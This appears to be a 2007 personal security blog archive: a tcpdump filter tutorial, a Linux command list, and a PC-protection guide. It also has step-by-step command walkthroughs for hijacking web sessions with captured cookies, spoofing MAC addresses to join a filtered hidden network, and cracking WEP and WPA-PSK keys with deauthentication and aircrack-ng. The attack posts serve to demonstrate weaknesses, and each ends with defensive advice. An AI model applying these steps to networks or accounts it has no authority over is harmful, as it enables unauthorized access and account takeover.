Saturday, December 29, 2007

Fun with Tcpdump

Tcpdump is a really useful program for capturing packets that are on the wire. It can be used to view packets going through your own interface, on a network with a hub, or on a switched network (arp-cache poisoning or mirrored switch ports).

The output from tcpdump can either be sent to the screen or written to a raw file using -w; the file can then be read back with tcpdump (using -r) or opened in a tool such as Wireshark.

Tcpdump is a tool that anyone who is interested in networks should be familiar with. It will help you understand what normal traffic looks like on your network at a packet level so you can quickly identify abnormal traffic.

The purpose of this blog post is to get a few of the commands documented to familiarize myself with the tool so I can quickly apply filters when needed.

For Windows users there is a very good port of tcpdump called WinDump; the syntax is very similar, if not identical.


Using Tcpdump

When first running tcpdump without any filters the output can be overwhelming. Don't worry about this, as you begin to get familiar with the filters you can quickly get to the information you want.

If you have multiple interfaces that are up you may need to use the -i {interface} switch.

tcpdump -i eth1

The command can be terminated with ctrl+c.

I recommend using the -n switch to prevent name resolution whilst you are performing the capture. The name resolution can always be performed later.

tcpdump -i eth1 -n

You can also cut down the amount of output using the quiet option (-q):

tcpdump -q

Or to really cut down on what I can see I could use the following, which just displays the from and to, the protocol and the packet size (-t also drops the timestamp):

tcpdump -qt

As previously mentioned the output of tcpdump can be sent to a file using the -w switch or straight to a text file using the redirect >.

I recommend writing the output to libpcap format using a command such as:

tcpdump -i eth1 -n -w capture.lpc

However, you may want to view the output on the screen as you write it to a file; this can be done by using the -l switch (line-buffered output) and piping through tee into the file:

tcpdump -l | tee mydump


You can also limit the capture to a certain number of packets using the -c switch. To only collect 100 packets:

tcpdump -c 100


The -c switch can also be used when reading from a packet capture file:

tcpdump -n -s 1514 -r capture.lpc -c 5 tcp

The command above will read the first 5 tcp packets from the capture.lpc file.




Collecting Packets Based on Size

Usually tcpdump does not collect the entire packet. Use the snaplen option -s 0 to force it to do so:

tcpdump -s 0

Or to only collect the first 1514 bytes of a packet:

tcpdump -s 1514

1514 bytes is a full-size Ethernet frame without VLAN tagging. To capture VLAN-tagged frames in full an additional 4 bytes will need to be added (-s 1518).


To only collect packets from a particular host:

tcpdump -i eth1 -n -w capture.lpc host 208.68.234.113


Name Resolution

As mentioned earlier, by default tcpdump will resolve network addresses into names. To disable this use the -n switch, and to disable port resolution as well use -nn:

tcpdump -nn

Use -f to print remote (non-local) addresses numerically rather than resolving them.


If you are on a LAN and want to capture only traffic to or from a particular MAC address use:

tcpdump ether host 11:22:33:44:55:66

Or if you want the Ethernet header in the output use the -e option:

tcpdump -i eth1 -e -n -s 1514 -w capture.lpc

To restrict the capture to a network use:

tcpdump -i eth1 -n -w capture.lpc -s 1514 net 192.168.1

or

tcpdump -i eth1 -n -w capture.lpc -s 1514 net 192.168.1.0 mask 255.255.255.0


Using Keywords

Keywords allow you to easily filter traffic. The keywords that can be used are ip, tcp, udp, icmp and igmp.

As an example of using keywords, to capture all IP traffic use keywords:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip

or to capture just TCP traffic:

tcpdump -i eth1 -n -w capture.lpc -s 1514 tcp

Other traffic types without keywords can be captured using the "ip proto" option:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip proto l2tp

or by its protocol number as found in the /etc/protocols file:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip proto 115


To capture traffic based on its application from further up the stack, such as FTP traffic, specify the port:

tcpdump -i eth1 -n -w capture.lpc -s 1514 port 21

And to capture the data portion of the FTP traffic as well you could add port 20. A single FTP packet uses one port or the other, so the two are joined with || (or), and the whole filter is quoted so the shell does not interpret the || itself:

tcpdump -i eth1 -n -w capture.lpc -s 1514 'port 21 || port 20'

This could have been specified by name as detailed in the /etc/services file.

tcpdump -i eth1 -n -w capture.lpc -s 1514 'port ftp || port ftp-data'

In the examples above I have used || to join 2 filters together. I could have used the word 'or' instead. && (or the word 'and') is the opposite: both conditions must be true of the same packet. Quote the filter whenever it contains && or ||, otherwise the shell treats them as command separators.

tcpdump -i eth1 -n -w capture.lpc -s 1514 'port http or https'
tcpdump -i eth1 -n -w capture.lpc -s 1514 'port 80 || 443'

The above filters will capture the same data.


Filtering by Packet Size

You could create a filter to capture packets that are larger than a certain size (in bytes):

tcpdump -i eth1 -n -w capture.lpc -s 1514 greater 250

This type of filter can be useful if you are trying to locate certain types of packet based on attributes from further up the stack.




We can also tell tcpdump to leave out certain types of traffic; in this example we don't want HTTP or HTTPS traffic but we want everything else:

tcpdump -i eth1 -n -w capture.lpc -s 1514 " (not tcp port http and not tcp port https)"



To view the output in hex and ASCII use -X (the verbose -v is optional). Note that -w sends the packets to the file instead of the screen, so leave -w off (or read the file back with -r) when you want to see the decode:

tcpdump -i eth1 -n -s 1514 -X -v

To dump the whole packet in hex only use:

tcpdump -i eth1 -n -s 1514 -x -v


Further Examples

To display a list of visited sites:

tcpdump -w dumpfile
tcpdump -r dumpfile > textfile
cat textfile | /usr/bin/cut -f 8 -d ' ' | /bin/grep -i 'www'


Looking at ICMP

Although you can capture all ICMP traffic, you could actually capture only particular types of ICMP based on attributes of the protocol. For example, if I wanted to capture just ICMP echo requests, knowing that an ICMP echo request is Type 8, I might use:

tcpdump -e -x "icmp[0]=8"

To capture just ICMP replies (Type 0) I might use:

tcpdump -e -x "icmp[0]=0"
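Everything in the filters above comes down to a few header fields. The Python below is an added example, not code from the original post and not part of tcpdump: it parses constructed Ethernet/IPv4 frames into those fields and implements the keyword, host, port, greater and icmp[0] filters as composable predicates, so each filter's effect can be checked against a known set of packets. The frame builders, sample packets and addresses are constructed for illustration. Two details worth noticing: tcpdump's 'greater N' keeps packets of length N or more, and a filter like 'port 21 and port 20' keeps nothing, since one packet carries one port pair.

```python
import struct
from typing import Callable, Optional

ETH_IPV4, ETH_8021Q = 0x0800, 0x8100
PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17
Pred = Callable[[dict], bool]

def parse_frame(frame: bytes) -> Optional[dict]:
    """Pull out the header fields tcpdump's filters test; None if not IPv4."""
    if len(frame) < 14:
        return None
    ethertype = struct.unpack("!H", frame[12:14])[0]
    offset, vlan = 14, None
    if ethertype == ETH_8021Q:
        # 802.1Q tag: the 4 extra bytes that push a full frame from 1514 to 1518 bytes.
        # tcpdump only looks past the tag when the filter says 'vlan'; this parser
        # strips it transparently, so the tagged sample frame below still counts.
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        vlan, offset = tci & 0x0FFF, 18
    if ethertype != ETH_IPV4 or len(frame) < offset + 20:
        return None
    ihl, proto = (frame[offset] & 0x0F) * 4, frame[offset + 9]
    src = ".".join(str(b) for b in frame[offset + 12:offset + 16])
    dst = ".".join(str(b) for b in frame[offset + 16:offset + 20])
    l4 = offset + ihl
    pkt = {"len": len(frame), "vlan": vlan, "proto": proto, "src": src, "dst": dst,
           "sport": None, "dport": None, "icmp_type": None}
    if proto in (PROTO_TCP, PROTO_UDP) and len(frame) >= l4 + 4:
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", frame[l4:l4 + 4])
    elif proto == PROTO_ICMP and len(frame) >= l4 + 1:
        pkt["icmp_type"] = frame[l4]  # the byte that 'icmp[0]' refers to
    return pkt

# Filter primitives, each mirroring one tcpdump filter keyword.
def ip_proto(num: int) -> Pred:      # 'tcp', 'udp', 'icmp', 'ip proto N'
    return lambda p: p["proto"] == num
def host(addr: str) -> Pred:         # 'host A' matches source or destination
    return lambda p: addr in (p["src"], p["dst"])
def port(num: int) -> Pred:          # 'port N' matches either direction
    return lambda p: num in (p["sport"], p["dport"])
def greater(n: int) -> Pred:         # tcpdump's 'greater N' is length >= N, not > N
    return lambda p: p["len"] >= n
def icmp_type(t: int) -> Pred:       # 'icmp[0]=T'
    return lambda p: p["proto"] == PROTO_ICMP and p["icmp_type"] == t
def and_(*fs: Pred) -> Pred:         # 'and' / '&&': every condition on the same packet
    return lambda p: all(f(p) for f in fs)
def or_(*fs: Pred) -> Pred:          # 'or' / '||'
    return lambda p: any(f(p) for f in fs)
def not_(f: Pred) -> Pred:           # 'not'
    return lambda p: not f(p)

# Builders for constructed sample frames (not a real capture; checksums left as 0).
def _ip(a: str) -> bytes:
    return bytes(int(x) for x in a.split("."))
def build_frame(proto: int, src: str, dst: str, l4: bytes, vlan: Optional[int] = None) -> bytes:
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0, _ip(src), _ip(dst))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb")  # dst MAC, src MAC
    tag = struct.pack("!HH", ETH_8021Q, vlan) if vlan is not None else b""
    return eth + tag + struct.pack("!H", ETH_IPV4) + ip_hdr + l4
def tcp(sport: int, dport: int, payload: bytes = b"") -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
def udp(sport: int, dport: int, payload: bytes = b"") -> bytes:
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
def icmp(type_: int, payload: bytes = b"") -> bytes:
    return struct.pack("!BBHHH", type_, 0, 0, 1, 1) + payload

SAMPLE_FRAMES = [
    build_frame(PROTO_TCP, "192.168.1.10", "208.68.234.113", tcp(40000, 21)),              # FTP control, 54 bytes
    build_frame(PROTO_TCP, "208.68.234.113", "192.168.1.10", tcp(20, 40001, b"D" * 300)),  # FTP data, 354 bytes
    build_frame(PROTO_TCP, "192.168.1.10", "10.0.0.5", tcp(40002, 443, b"T" * 100)),       # HTTPS, 154 bytes
    build_frame(PROTO_ICMP, "192.168.1.10", "192.168.1.1", icmp(8, b"P" * 56)),            # echo request, 98 bytes
    build_frame(PROTO_ICMP, "192.168.1.1", "192.168.1.10", icmp(0, b"P" * 56)),            # echo reply, 98 bytes
    build_frame(PROTO_UDP, "192.168.1.10", "192.168.1.1", udp(5353, 53, b"Q" * 30)),       # DNS query, 72 bytes
    build_frame(PROTO_TCP, "192.168.1.10", "10.0.0.6", tcp(40003, 80), vlan=10),           # VLAN-tagged HTTP, 58 bytes
]

FILTERS = {
    "ip": lambda p: True,                 # everything parse_frame accepted is IPv4
    "tcp": ip_proto(PROTO_TCP),
    "udp": ip_proto(PROTO_UDP),
    "icmp": ip_proto(PROTO_ICMP),
    "host 208.68.234.113": host("208.68.234.113"),
    "port 21 or port 20": or_(port(21), port(20)),
    "port 21 and port 20": and_(port(21), port(20)),  # never matches: no packet carries both
    "greater 250": greater(250),
    "icmp[0]=8": icmp_type(8),
    "not (port 80 or port 443)": not_(or_(port(80), port(443))),
}

def count_matches(frames, pred: Pred) -> int:
    return sum(1 for f in frames if (p := parse_frame(f)) is not None and pred(p))

def demo() -> dict:
    """How many of the sample frames each filter keeps."""
    return {name: count_matches(SAMPLE_FRAMES, pred) for name, pred in FILTERS.items()}
```

Calling demo() returns the number of sample frames each filter keeps. The VLAN-tagged frame is the 4 bytes a 1514-byte snaplen would miss, and it is the one place this parser is more permissive than tcpdump, which needs 'vlan' in the filter before it will look past the tag.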


Wireless Stuff

If I was curious about what networks wireless clients are probing for I could set my card into promiscuous mode (ifconfig eth1 promisc), configure my wireless settings to monitor mode (iwconfig eth1 mode monitor) and issue the following command:

tcpdump -i eth1 -s0 -nn -vv -t | grep -i request

This would reduce the output to just the probe requests from nearby wireless clients.




Note: I will update this blog entry with new and interesting uses for Tcpdump as I learn them.


Links

For a great book on network monitoring using Tcpdump as well as many other open source tools try "The Tao of Network Security Monitoring" by Richard Bejtlich.

Another great book on this topic is "Practical Packet Analysis".

Friday, December 28, 2007

Stealing Cookies with WifiZoo

The purpose of this blog post is to demonstrate the sort of thing an attacker could do just by listening to your traffic on a wireless network.

In the example below I will set my wireless card to capture cookies from a valid session between a victim and a website. The attacker is then able to easily connect to the website using the captured cookie and will automatically be logged in as the victim.

I have tested this on a number of websites including Google Mail; however, I will demonstrate it using a connection to a web forum called Binary Revolution. Please note, this is not possible due to a fault with the websites, it is possible due to unencrypted traffic. That said, I could perform the same attack on a wired network using arp-cache poisoning.


Tools

  • Kismet
  • WifiZoo
  • Firefox

The Attack

1. Using Kismet I find my target network and force it to lock onto just that channel.




2. I now use the command below to bring up my wireless interface.

ifconfig wlan0 up


3. I start Wifizoo, point my Firefox proxy settings to 127.0.0.1 port 8080 and point my browser to the wifizoo config page on http://127.0.0.1:8000




4. I now connect my LAN interface to the network, bring it up and get an IP address.

ifconfig eth0 up
dhclient eth0


5. On the victim PC which is using a wireless connection I browse to an interesting site and log in.




6. Back on my evil attacker laptop I look at the cookies page in the WifiZoo webpage and see what cookies I have collected so far.



I select a cookie, click on it and I'm taken straight into the website using the victim's credentials.



It really is that simple. So next time you're on a public network think about what you are doing.


Conclusion

Be careful on public networks, use encryption (SSL and SSH) and VPNs where possible.


Tools used in this blog post were from the BackTrack3 security distro.

Bypass Hidden SSID & MAC Address Filtering

The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.

Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.

Tools

  • Kismet

The Attack

1. I first use Kismet to look at the wireless networks within range.



My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.

At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:

iwconfig eth1 essid batman

Then I would try to obtain an IP address using:

dhclient eth1

The request for an IP Address would fail as the WAP is filtering MAC addresses.


2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.



I see an active client is using the MAC of 00:16:6F:4D:AE:8C.

I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.


3. I check my current wireless card config using ifconfig.



Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.


4. I now want to take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:

ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman



I verify the output of these commands with ifconfig and iwconfig as I go along.


5. I now request an IP address from the DHCP server on the WAP using:

dhclient eth1



I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)

If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.


6. I now test connectivity to the web using ping:

ping www.yahoo.com



My ping works; this tells me I have web access and DNS is working correctly.


Conclusion

Hopefully this demonstration has proven to you how simple it is for an attacker to bypass some of the more basic restrictions. Don't rely on a hidden SSID or MAC Address filtering as your only security measures. They may stop the average neighbor from using your internet connection but they will not prevent an attacker from breaking into your network and using your internet connection.

Sunday, December 23, 2007

Wireless Network Penetration

The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.

The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.

The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.

Tools

  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • Wireless Assistant


The Attack

1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly.

airodump-ng wlan0



I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).

If my card wasn't correctly set up (i.e. in promiscuous and monitor mode) I could either run airmon-ng or set it up manually as detailed below:

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IVs) on channel 3 and output them to a file using my wireless interface (wlan0):

airodump-ng --ivs -c 3 -w wepdump wlan0



The result of this is 2 files, wepdump-01.txt & wepdump-01.ivs. The .ivs file is the one I am interested in.

When capturing data to break WPA-PSK do not use the --ivs switch; the entire packet needs to be captured. Another requirement for cracking WPA-PSK is to force the client to re-associate with the AP. This can be done using the aireplay-ng tool and the following syntax:

aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0

To obtain the AP & client BSSIDs I use Kismet, however this can be done with aireplay-ng. Check out the switches.


Note: when collecting the IV's having the best signal possible will speed things up.


3. After 15 mins I stop the capture and run the collected IVs through aircrack-ng. I specify the BSSID in this command.

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs



As you can see it has decrypted the key as C3:C0:8C:90:3D

If I were decrypting WPA-PSK I would need to specify a dictionary file containing the password with the -w switch. My syntax would therefore look like this:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap


4. I now reconfigure my wireless card to connect to the wireless network.



Currently the card is in monitor mode so I reconfigure it using the following commands:

ifconfig wlan0 down

ifconfig wlan0 -promisc

iwconfig wlan0 mode managed

ifconfig wlan0 up

Once reconfigured I quickly check I can see the target network using:

iwlist scan


5. I now use the Wireless Assistant to connect the target network with the key.




6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.



Now that I have an IP on this network I can either use the connection to access the Internet, perform further attacks against hosts on the wireless network, or capture the web traffic and do interesting things with that.


Conclusion

WEP encryption is very broken. Only use it as a last resort, if no other encryption is available. If you do need to use WEP, use additional layers of security to protect your network further, such as MAC address filtering, a hidden SSID, fixed IPs or a limited DHCP scope. These additional measures can all be bypassed but they make the attacker's job that little bit harder.


Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!


Links

Thursday, December 13, 2007

Protect Your PC for Free

I'm often asked by friends and family what to use to protect their PCs against spyware and viruses. The purpose of this blog post is simply to list a selection of free tools that people can use to clean up and protect their PCs against the threats posed by malware.

Malware (I lump spyware and viruses together to form malware, by the way) is a program or code that has been created with malicious intent. That intent may be to steal your identity, invade your privacy, or to use your computer to attack other internet systems without your knowledge.

One important note, make sure to update the signatures for the tools you use. New threats emerge on a daily basis and for your software to protect you against these threats it must know about them, the way it knows about them is by signature updates.

As with any software, I urge the person installing that software to become familiar with it. Read the program's help files, Google "software-name tutorial", click around in the interface and look at the various options. Only by becoming familiar can you use the tool to its full potential and effectively protect your computer.

I'll list the tools in the order I consider the most relevant.

1. Windows Password
Make sure you have set a good password on your account. If you have either a blank password or an easy to guess password Malware or attackers can use dictionary based attacks to guess these.

It is also important to have good passwords on all your accounts such as email, internet banking, Facebook etc. Think of it like this: if I can guess your email password, or use a program to guess it using a dictionary based attack, and get into your email, I could then try the same password on your bank. If that fails I could go to the bank website and tell the bank I have forgotten the password and it will email a new one to your email account, which I have access to. BINGO!

Change your password in Windows by either pressing Ctrl-Alt-Delete and selecting Change Password or by going into the Control Panel (Start Menu > Control Panel) and selecting User Accounts. If you have an Administrator account as well as your own, change this password to something strong also.

A good or strong password is a word or phrase that is longer than eight characters, has numbers in it and uses symbols (&%$* etc...) and has a capital letter or two. An example is:

AGoodStr0ngP&$word!

or

(SynJunki3isTh3Gr3at3st)


2. Windows Update.
As vulnerabilities are discovered Microsoft releases patches to fix these and prevent attackers and code from exploiting the vulnerabilities. These patches are released every month but occasionally Microsoft will release critical patches out of cycle if it deems it necessary. Windows can be set to retrieve these patches automatically.

To do this in XP:

  1. On the Start Menu, click on the Control Panel and depending on your view select either Security Centre or Automatic Updates.
  2. From the window presented configure automatic updates and click OK.
In Vista it's pretty much the same.


3. Windows Firewall
If you consider your computer as a house, it has lots of windows and doors (131,072 to be exact) and these can be easily opened by programs on your computer without you knowing. A firewall will effectively close these windows and doors and only open them if you give permission.

Windows has a built in firewall; it's not the best in the world but it's alright. Turn the firewall on in the Security Center (Control Panel again) and have a look at its settings to become familiar with it. You can view the firewall settings by looking at the Exceptions tab in the Firewall Settings. Here it lists all the programs that are allowed to bypass the firewall.

Also make sure the tick box for "Display a notification when Windows Firewall blocks a program" is ticked. This will then prompt you when something wants to change your settings.

If you see a program listed that you are unsure of, Google it and find out what it is. You can always remove the tick on the application in the list or delete the entry, and next time the program wants to go out you will get a prompt. Then you'll have a better idea what it is.

Also check out the advanced tab, if you have multiple network cards (LAN and wireless) you can set these up differently or check the options on both.


4. Spybot Search & Destroy
Spybot Search & Destroy (S&D) is a free program that has many useful functions. Once installed click on the updates button and download the latest updates. Alternatively you can download updates from the website.

After installing the latest updates, click on the immunize button. This will protect your PC from all the current threats that Spybot S&D knows about.

Following immunization click on the "Check for problems" button. This will scan your PC for any installed spyware and give you the option to fix the problem. Do this a couple of times and if you cannot get rid of something Google it and find out more about the problem. Chances are someone has already had the same problem and you can see what they did to fix it.

Update your signatures, immunize your PC and scan for spyware on a frequent basis; I perform this type of update and scan every week.

Spybot S&D has many other advanced options which can be enabled by the mode drop-down menu. The options allow you to schedule scans, securely shred documents and tweak Windows settings among other things.

If you use Spybot S&D please consider making a donation to the software vendor. You can do this by selecting Donations from the Help menu in Spybot S&D.


5. Avast Anti-virus
Avast is a really good free Anti-Virus scanner. Once installed it will permanently run in the background and scan any opened files for viruses. You can also scan a drive or file by right-clicking on whatever you want to scan and clicking Scan.

Avast is free for home use but you will need to register it. It will automatically download updates.

You can set the options on Avast by opening the Avast interface from the Start menu (or from the System Tray by the clock). Holding your mouse above any button will display a description of the functions available.


6. CCleaner
CCleaner is a registry cleaner that will clean up the registry on your computer. It will look for old entries, missing DLLs and many other registry related problems.

As well as being a brilliant little tool to help you understand what programs store what information and where (by selecting just that program and performing a scan), CCleaner can remove entries in programs and Windows to help protect your privacy: Internet cookies, lists of recently accessed files, browser history, log files and so on.


7. McAfee Rootkit Detective
Rootkits are becoming more popular these days as once they are installed they can hide themselves from the operating system. Often AV scanners will not detect rootkits, and they are as malicious as any other form of spyware or virus. McAfee developed a free tool to detect and remove rootkits. Rootkit Detective is very simple to use. After installation simply run the scan and remove anything it finds. If it does find something and you are unsure whether to remove it or not, just Google it. Google will tell you if what it has found is bad. Google is your friend. (Sort of.)


Other
As people get better at applying patches and using firewalls etc., attackers are targeting other applications that have widespread usage, such as Adobe Acrobat, WinZip, QuickTime and iTunes. As these will not be included in the Microsoft patch cycle they are often forgotten about and become a viable target. If you use these applications check on a weekly or even monthly basis to see if there is a newer version, or have a poke around in the application itself to see if you can find an update function or update link.


Links

Friday, December 7, 2007

Basic Linux Commands

The purpose of this blog entry is to document a few basic Linux commands that I find useful. I'm fairly new to Linux and recording these commands gives me a point of reference and helps me remember them.

It's important to note that in Linux syntax is case sensitive.

I am using Ubuntu so my syntax may differ slightly from yours if you are using another distro. If you want to learn more about any of the commands I list try the following:

man command (e.g. man ls)

or

command -h

or

command --help


The sections I have added so far are:

1. Users
2. Navigation
3. Files
4. Networking
5. Hardware
6. System Tools


I will add to this document as I learn more commands.



1. Users

To add a new user called bob:

adduser bob

To switch to a new user called bob:

su bob

To change bob's password:

passwd bob

To switch straight to root:

su

To run a command as root whilst logged in as another user:

sudo command

* this assumes you are in the sudo group.

To view which user you are currently logged in as use:

whoami


2. Navigation

To list directories use:

ls

To list all files including hidden ones, with permissions, use:

ls -la

To list all directories in another folder use the following syntax:

ls -la /home/bob/

In the output anything preceded with a . is hidden.


To change directory use:

cd directory_name

Or the path:

cd /etc/directory_name

To move back in the directory structure use:

cd ..

or

cd ../..

To navigate directly to the root / directory:

cd /

To navigate directly to your home directory:

cd ~

To print the current directory use:

pwd


3. Files

To view the contents of a file:

cat filename.txt

To delete a file:

rm filename.txt

To delete a directory with all its files and sub-directories (without prompting):

rm -Rf directory_name

To locate a file:

locate filename.txt

To change the owner of a file use:

chown bob filename.txt

To change the group ownership as well use:

chown bob:users_group filename.txt

To create a directory use:

mkdir mydirectory

To create a file use:

touch myfilename

To move or rename a file use:

mv file1 file2

To copy a file to bob's home directory use:

cp file1 /home/bob/


4. Networking

To obtain a DHCP address (on all interfaces):

dhclient

Or on just one particular interface:

dhclient eth1

To view the interface network properties:

ifconfig

To set the IP address of a interface:

ifconfig eth1 192.168.1.100/24

To change the MAC address of an interface:

ifconfig eth1 hw ether 11:22:33:44:55:66

To put an interface into promiscuous mode:

ifconfig eth1 promisc

To take an interface out of promiscuous mode:

ifconfig eth1 -promisc

To view the wireless interface settings:

iwconfig

To set the wireless interface to a particular wireless AP:

iwconfig eth1 essid my_wireless_network

To set the wireless interface to managed mode:

iwconfig eth1 mode managed

To set a wireless interface to monitor mode (for sniffing etc..)

iwconfig eth1 mode monitor

To configure WEP encryption on a wireless interface:

iwconfig eth1 enc {enc key}

To configure a wireless interface to use a particular channel:

iwconfig eth1 channel 3

To view the routing table:

route

To view the routing cache:

route -C

To set a static route to a network:

route add -net 172.16.0.0 netmask 255.255.0.0 dev eth1

To set a static route to a host:

route add -host 80.127.23.65 eth1

To delete a route:

route del -host 80.127.23.65 eth1

To add a default gateway of 192.168.1.1:

route add default gw 192.168.1.1


Tracerouting in Linux uses UDP packets as opposed to Windows, which uses ICMP.

To traceroute to a target (yahoo in my example) use:

traceroute www.yahoo.com

Another really cool program I found on my system for tracerouting and providing really useful diagnostic info is mtr:

mtr www.yahoo.com

Bear in mind that unlike traceroute, mtr uses ICMP echo requests.

To list all network connections (TCP and UDP, listeners included, with numeric addresses and the owning process):

netstat -punta

To list network statistics:

netstat -s

To list statistics on an interface:

netstat -i eth1

For a continuous listing with any netstat command add -c to the command:

netstat -punta -c


To list any IPTables rules:

iptables -L -v

To quickly add a rule to drop all outgoing ICMP:

iptables -A OUTPUT -p icmp -d 0/0 -j DROP

The above command appends (-A) a rule to the output (OUTPUT) chain telling it that ICMP (-p icmp) to any destination (-d 0/0) should be dropped (-j DROP).

To remove your rule you can flush the OUTPUT chain (this removes every rule in that chain, not just yours):

iptables -F OUTPUT

To flush all rules use:

iptables -F

To delete all empty user-defined chains:

iptables -X

The following rules can be used to rate limit connections to prevent brute-force logins to port 21 (FTP):

iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent --set

iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent \
  --update --seconds 60 --hitcount 4 -j DROP

Using the rules above will drop any more than 3 connection attempts in 60 seconds from the same IP address.
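As an added example (mine, not from the post), here is a small Python model of what the two-rule pattern does, driven by constructed lines in the format 'tcpdump -n' prints, so the effect can be checked without touching a live firewall. The line format, addresses and timings are made up; the limiter models the rule pair's stated behaviour (the 4th new connection from one source within 60 seconds is dropped), it is not a copy of the kernel's xt_recent module.

```python
import re
from collections import defaultdict, deque

# Timestamp, addresses and TCP flags as printed by 'tcpdump -n' for one segment.
LINE_RE = re.compile(
    r"^(\d\d):(\d\d):(\d\d)\.(\d{6}) IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > "
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]+)\]")

def parse_line(line: str):
    """Return the fields the iptables rule looks at, or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, s, us, src, _sport, _dst, dport, flags = m.groups()
    return {"t": int(h) * 3600 + int(mi) * 60 + int(s) + int(us) / 1e6,
            "src": src, "dport": int(dport), "flags": flags}

class RecentLimiter:
    """Simplified model of '-m recent --set' plus '--update --seconds S --hitcount N':
    the N-th new connection from one source inside a sliding S-second window is
    dropped. Dropped attempts still refresh the entry, as --update does, so a client
    that keeps hammering stays blocked until it backs off for a full window.
    (A model of the stated behaviour, not a line-for-line copy of xt_recent.)"""
    def __init__(self, seconds: int = 60, hitcount: int = 4):
        self.seconds, self.hitcount = seconds, hitcount
        self.stamps = defaultdict(deque)        # source IP -> recent attempt times

    def decide(self, src: str, now: float) -> str:
        q = self.stamps[src]
        while q and now - q[0] > self.seconds:  # forget attempts older than the window
            q.popleft()
        q.append(now)
        return "DROP" if len(q) >= self.hitcount else "ACCEPT"

def rule_applies(pkt, dport: int = 21) -> bool:
    # '-p tcp --dport 21 -m state --state NEW': a bare SYN to the FTP control port.
    return pkt is not None and pkt["dport"] == dport and pkt["flags"] == "S"

def simulate(lines, seconds: int = 60, hitcount: int = 4):
    """Run the rule pair over tcpdump-style lines; returns (source, verdict) per matching SYN."""
    limiter = RecentLimiter(seconds, hitcount)
    verdicts = []
    for line in lines:
        pkt = parse_line(line)
        if rule_applies(pkt):
            verdicts.append((pkt["src"], limiter.decide(pkt["src"], pkt["t"])))
    return verdicts

# Constructed sample lines in 'tcpdump -n' format (not a real capture).
SAMPLE_LINES = [
    "12:00:00.000000 IP 10.0.0.9.51000 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",
    "12:00:05.000000 IP 10.0.0.9.51001 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",
    "12:00:10.000000 IP 10.0.0.9.51002 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",
    "12:00:12.000000 IP 10.0.0.7.40000 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",
    "12:00:15.000000 IP 10.0.0.9.51003 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",  # 4th in 60 s
    "12:00:16.000000 IP 192.168.1.20.21 > 10.0.0.7.40000: Flags [S.], seq 1, ack 2, win 65535, length 0",  # reply, not NEW
    "12:00:20.000000 IP 10.0.0.9.51004 > 192.168.1.20.22: Flags [S], seq 1, win 64240, length 0",  # port 22, rule not involved
    "12:01:20.000000 IP 10.0.0.9.51005 > 192.168.1.20.21: Flags [S], seq 1, win 64240, length 0",  # window has expired
]
```

simulate(SAMPLE_LINES) shows the third source's fourth SYN within the window being dropped while the other client is untouched, and the attempt 80 seconds after the first being accepted again once every earlier stamp has aged out.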


(I will post a blog article on iptables rules)


Or to make the host ignore ICMP echo requests you could run or script the following command:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

The default is 0, so to revert it use:

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

